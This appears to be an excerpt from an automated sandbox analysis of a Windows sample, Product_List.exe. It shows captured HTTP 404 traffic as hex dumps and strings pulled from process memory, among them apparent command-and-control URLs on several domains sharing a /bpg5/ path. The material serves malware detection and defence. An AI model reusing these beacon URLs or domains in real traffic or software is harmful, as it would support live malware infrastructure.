20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:51:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:51:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:51:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:52:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: LiteSpeedx-powered-by: PHP/8.1.19expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 31 39 39 64 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 Data Ascii: 199d7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:52:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: LiteSpeedx-powered-by: PHP/8.1.19expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a Data Ascii: 3e4
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 May 2023 15:52:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: W/"afe-57777afe91410"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 May 2023 15:52:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: W/"afe-57777afe91410"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
          Source: explorer.exe, 00000004.00000000.608430736.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
          Source: explorer.exe, 00000004.00000000.608430736.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
          Source: Product_List.exe, 00000000.00000003.554309113.00000000056EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wikipfj
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000002.826129272.0000000016800000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.814741230.0000000003FF0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/www.42230.orgJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.orgI
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/www.antalyabfe.comJBfKk=_uLb4J-vJhW8
          Source: Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/www.bisarropainting.comJBfKk=_uLb4J-vJhW8
          Source: explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comAD
          Source: Product_List.exe, 00000000.00000003.555688597.00000000056E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comcro
